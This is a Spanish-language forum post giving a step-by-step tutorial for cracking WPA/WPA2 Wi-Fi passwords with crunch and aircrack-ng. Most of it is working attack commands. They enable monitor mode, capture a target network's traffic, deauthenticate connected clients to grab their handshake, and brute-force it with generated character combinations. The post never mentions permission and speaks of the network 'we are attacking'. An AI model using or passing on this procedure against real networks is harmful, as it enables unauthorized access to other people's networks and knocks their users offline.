Bueno este es mi primer "aporte" (en realidad me base en algunos tutoriales que vi y uni segu me parecio mejor), asi que si cometo algun error espero me corrijan.
aqui dejo uno de los tut. que leí
http://www.miralapantalla.com/auditorias-backtrack-5-crackear-claves-wpawpa2-sin-diccionario/
Descifrar wpa-wpa2 sin diccionario con crunch
Yo se que hay muchos que estan aburridos de estar haciendo o descargando diccionarios para hacer el uso de "la fuerza bruta", aunque lo que <<en mi opinion>> eso no es fuerza bruta, si no una cosa de suerte, aqui les digo como hacer el uso de "la fuerza bruta" para descifrar una wpa-wpa2.
primero descargarse el crunch.
http://db.tt/sXflhAeR
después lo instalas (esto lo saque del tuto del link de arriba).
vamos a la carpeta donde se ha descargado y hacemos click derecho y abrir en un terminal. Cuando se abra el terminal teclearemos:
tar -xvzf crunch-3.3.tgz
Entramos en el directorio donde se acaba de descomprimir escribiendo:
cd crunch-3.3
Vamos a la carpeta y abrimos el archivo MakeFile para donde pone (en gedit tecleando $ gedit Makefile):
val: crunch.c @echo “Building valgrind compatible binary…”
$(CC) $(VCFLAGS) $(LFS) $? -o crunch
Cambiar la última línea por:
$(CC) $? $(VCFLAGS) $(LFS) -o crunch
Y en donde pone:
crunch: crunch.c
@echo “Building binary…”
$(CC) $(CFLAGS) $(LFS) $? -o $@
Cambiar la última línea por:
$(CC) $? $(CFLAGS) $(LFS) -o $@
Guardamos y nuevamente en el terminal escribiremos:
make install
Para copiarlo en el sbin haciendo así:
cp crunch /usr/sbin/
hasta ahi va la instalación de crunch....
Ahora viene lo bueno...
si de casualidad no tienes todas las herramientas (aircrack-ng) puedes descargarlas de aquí:
http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz
y aqui les dejo algo de como instalarlo:
http://www.bluegehena.com/2012/12/instalar-aircrack-ng-en-linux-mint-13.html
Volviendo al tema......
vamos a la terminal y corremos airmon-ng (como supongo que algunos ya saben jeje).
tecleamos airmon-ng y activamos modo monitor, en mi caso es:
airmon-ng start wlan0
luego, vamos a analizar las redes:
airodump-ng mon0
ahora se elige la red a crackear:
airodump-ng -w crack (cualquier nombre aqui) -c 6 (canal que utiliza la red) --bssid xx:xx:xx:xx:xx (mac de la red que estamos atacando) mon0 (interfaz utilizada)
Ok, hasta aquí igual al cracking de wep, ahora vamos a conseguir el handshake que es un archivo que manda el ordenador con la contraseña al router para que este acepte la conexión. Podemos esperar a que un cliente se conecte, o si no, si hay algún cliente conectado, procederemos a su desautentificación para que se desconecte y al volverse a conectar capturemos su Handshake :
aireplay-ng -0 00 (00 es el numero de veces que queremos que se intente desautentificar, con 50 suele llegar) -a (mac del router) -c (mac del cliente que está conectado, aparece justo debajo de donde pone station) (interface que estamos usando).
aquí talves te pida que pongas el nombre de la red (a mi me paso jeje) asi que solo pones -e [NombreDeLaRed] y algunos otros problemas jeje
ahora al tener el handshake viene lo siguiente:
crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -
8 9 igual el numero de digitos de la pass y 0123456789 los digitos que utilizara para hacer las combinaciones.
aquí llega el ejemplo de la pag. que ví, lo que no dice es que puedes poner por ejemplo:
abcdefghixyz0123456789 y te mezclara las combinaciones con las letras!!
así es posible llegar a cualquier contraseña porque tecleara todas las combinaciones posibles.... el problema es cuando jejeje
aquí es donde se ve la verdadera fuerza bruta.
Porque si no se te ocurre cual contrseña puede ser, solo dejas esto correr hasta que salga, pero eso si, ¡¡tienes que ser paciente!! jajaja
Espero les sirva, la pregunta no es: ¿¿se puede crackear una wpa-wpa2 sin diccionario?? si no : ¿¿Cuanto se tarda?? jajaja muchas gracias, si cometí algun error me dicen por favor ^^'